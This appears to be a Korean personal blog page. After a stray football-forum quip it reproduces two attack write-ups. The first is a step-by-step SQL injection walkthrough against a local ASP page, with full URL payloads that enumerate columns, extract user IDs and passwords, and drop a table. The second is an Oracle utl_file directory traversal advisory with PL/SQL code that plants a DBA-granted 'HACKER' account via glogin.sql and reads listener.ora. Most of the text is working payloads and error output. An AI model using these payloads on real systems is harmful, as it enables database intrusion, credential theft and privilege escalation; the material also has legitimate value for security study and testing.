ToTo

ㅋㅋㅋ 할말을 잃게 만든다... 벤치성 어디로 이적하려나



출처: http://gall.dcinside.com/list.php?id=football_new4&no=2653777

SQL injection에 취약한 소스


1. id 파라미터 값과 관계된 테이블의 컬럼 갯수 구하기
http://localhost/web/id_search.asp?id='+order+by+1-- (true)
http://localhost/web/id_search.asp?id='+order+by+5-- (true)
http://localhost/web/id_search.asp?id='+order+by+10-- (true)
http://localhost/web/id_search.asp?id='+order+by+11-- (false)
오류 형식:
Microsoft OLE DB Provider for SQL Server (0x80040E14)
The ORDER BY position number 11 is out of range of the number of items in the select list.
/web/id_search.asp, line 8

따라서 해당 테이블의 관계된 컬럼 갯수는 10

2. having을 이용하여 테이블명, 컬럼명 취득
http://localhost/web/id_search.asp?id='+having+1=1--
오류 형식:
Microsoft OLE DB Provider for SQL Server (0x80040E14)
Column 'member.id' is invalid in the select list because it is not contained in an aggregate function and there is no GROUP BY clause.
/web/id_search.asp, line 8

http://localhost/web/id_search.asp?id='+group+by+member.id+having+1=1--
오류 형식:
Microsoft OLE DB Provider for SQL Server (0x80040E14)
Column 'member.user_id' is invalid in the select list because it is not contained in either an aggregate function or the GROUP BY clause.
/web/id_search.asp, line 8

http://localhost/web/id_search.asp?id='+group+by+member.id,member.user_id+having+1=1--
오류 형식:
Microsoft OLE DB Provider for SQL Server (0x80040E14)
Column 'member.name' is invalid in the select list because it is not contained in either an aggregate function or the GROUP BY clause.
/web/id_search.asp, line 8

http://localhost/web/id_search.asp?id='+group+by+member.id,member.user_id,member.name+having+1=1--
오류 형식:
Microsoft OLE DB Provider for SQL Server (0x80040E14)
Column 'member.user_pw' is invalid in the select list because it is not contained in either an aggregate function or the GROUP BY clause.
/web/id_search.asp, line 8

http://localhost/web/id_search.asp?id='+group+by+member.id,member.user_id,member.name,member.user_pw+having+1=1--
오류 형식:
Microsoft OLE DB Provider for SQL Server (0x80040E14)
Column 'member.nickname' is invalid in the select list because it is not contained in either an aggregate function or the GROUP BY clause.
/web/id_search.asp, line 8

http://localhost/web/id_search.asp?id='+group+by+member.id,member.user_id,member.name,member.user_pw,member.nickname+having+1=1--
오류 형식:
Microsoft OLE DB Provider for SQL Server (0x80040E14)
Column 'member.zipcode' is invalid in the select list because it is not contained in either an aggregate function or the GROUP BY clause.
/web/id_search.asp, line 8

http://localhost/web/id_search.asp?id='+group+by+member.id,member.user_id,member.name,member.user_pw,member.nickname,member.zipcode+having+1=1--
오류 형식:
Microsoft OLE DB Provider for SQL Server (0x80040E14)
Column 'member.address1' is invalid in the select list because it is not contained in either an aggregate function or the GROUP BY clause.
/web/id_search.asp, line 8

3. union을 이용하여 컬럼 밸류 타입 취득 (공격자에게 완벽한 insert 문을 만들 수 있도록 제공)
http://localhost/web/id_search.asp?id='+union+select+sum(user_id)+from+member--
오류 형식:
Microsoft OLE DB Provider for SQL Server (0x80040E07)
The sum or average aggregate operation cannot take a varchar data type as an argument.
/web/id_search.asp, line 8

http://localhost/web/id_search.asp?id='+union+select+sum(id)+from+member--
오류 형식:
Microsoft OLE DB Provider for SQL Server (0x80040E14)
All queries in an SQL statement containing a UNION operator must have an equal number of expressions in their target lists.
/web/id_search.asp, line 8
data type이 numeric type일 경우 위와 같은 에러가 남

http://localhost/web/id_search.asp?id='+union+select+sum(user_pw)+from+member--
오류 형식:
Microsoft OLE DB Provider for SQL Server (0x80040E07)
The sum or average aggregate operation cannot take a varchar data type as an argument.
/web/id_search.asp, line 8

4. union을 이용 필드 값 추출
http://localhost/web/id_search.asp?id='+union+select+1,2,3,4,5,6,7,8,9,10+from+member--


http://localhost/web/id_search.asp?id='+union+select+1,@@version,3,4,5,6,7,8,9,10+from+member--


http://localhost/web/id_search.asp?id='+union+select+1,user_id,3,4,5,6,7,8,9,10+from+member--


http://localhost/web/id_search.asp?id='+union+select+1,user_pw,3,4,5,6,7,8,9,10+from+member+where+user_id='test'--


http://localhost/web/id_search.asp?id='+union+select+min(user_id),1,2,3,4,5,6,7,8,9+from+member+where+user_id+>+'a'--
오류 형식:
Microsoft OLE DB Provider for SQL Server (0x80040E07)
Syntax error converting the varchar value 'apple' to a column of data type int.
/web/id_search.asp, line 8

http://localhost/web/id_search.asp?id='+union+select+min(user_id),1,2,3,4,5,6,7,8,9+from+member+where+user_id+>+'apple'--
오류 형식:
Microsoft OLE DB Provider for SQL Server (0x80040E07)
Syntax error converting the varchar value 'test' to a column of data type int.
/web/id_search.asp, line 8

http://localhost/web/id_search.asp?id='+union+select+min(user_id),1,2,3,4,5,6,7,8,9+from+member+where+user_id+>+'test'--
오류 형식:
Microsoft OLE DB Provider for SQL Server (0x80040E07)
Syntax error converting the varchar value 'totoriverce' to a column of data type int.
/web/id_search.asp, line 8

http://localhost/web/id_search.asp?id='+union+select+min(user_id),1,2,3,4,5,6,7,8,9+from+member+where+user_id+>+'totoriverce'--
더 이상 없음

※ Transact-SQL (MYSQL의 concat과 같이 한 라인에 정보 노출)
http://localhost/web/id_search.asp?id=';begin+declare+@ret+varchar(8000)+set+@ret=':'+select+@ret=@ret+''+user_id+'/'+user_pw+from+member+where+user_id>@ret+select+@ret+as+ret+into+foo+end--


http://localhost/web/id_search.asp?id='+union+select+1,ret,3,4,5,6,7,8,9,10+from+foo--


생성한 테이블(foo) 삭제
http://localhost/web/id_search.asp?id=';drop+table+foo--

참조: http://lael.be/84

출처: http://www.red-database-security.com/exploits/oracle-directory-traversal-via-utl_file.html

Oracle Exploit Directory Traversal via utl_file

Name             Oracle Directory Traversal via utl_file
취약버전         Oracle 8 / 8i / 9i
Severity          Medium Risk
Category         Directory Traversal
Vendor URL    http://www.oracle.com/
Credit              Cesar Cerrudo / Pete Finnigan
Exploit             http://www.argeniss.com
Date                05 May 2005 (V 1.00)
 
Details
디렉터리 트래버셜을 사용하므로써 데이터베이스 내의 파일을 읽고 쓰고 이름을 변경하는 것이 가능함
become DBA (via glogin.sql /login.sql)
read passwords (e.g. mod_plsql, listener.ora)
데이터베이스 버전에서 ..\ syntax를 허용해줘야 가능함

init.ora 파라미터에 "utl_file_dir=*" 설정하였거나 public에게 "CREATE ANY DIRECTORY" 권한이 있을 경우 취약

Example
--Create a file mytextfile.txt in the same directory referenced by MEDIA_DIR directory object.
declare
f utl_file.file_type;
begin
f:=UTL_FILE.FOPEN ('MEDIA_DIR','\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\glogin.sql','w',1000);
UTL_FILE.PUT_LINE (f,'CREATE USER HACKER IDENTIFIED BY HACKER;',TRUE);
UTL_FILE.PUT_LINE (f,'GRANT DBA TO HACKER;',TRUE);
UTL_FILE.FCLOSE(f);
end;

--Read arbitrary files in the same drive as the directory referenced by MEDIA_DIR directory object.
SET SERVEROUTPUT ON
declare
f utl_file.file_type;
sBuffer Varchar(8000);
begin
f:=UTL_FILE.FOPEN ('MEDIA_DIR','\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\oracle\ora92\network\ADMIN\listener.ora','r');
loop
UTL_FILE.GET_LINE (f,sBuffer);
DBMS_OUTPUT.PUT_LINE(sBuffer);
end loop;
EXCEPTION
when no_data_found then
UTL_FILE.FCLOSE(f);
end;

--Rename any file in the same drive as the directory referenced by MEDIA_DIR directory object
begin
UTL_FILE.frename('MEDIA_DIR','\\.\\..\\.\\..\\.\\myoldtextfile.txt','MEDIA_DIR','\\.\\..\\.\\..\\.\\mynewtextfile.txt',TRUE);
end;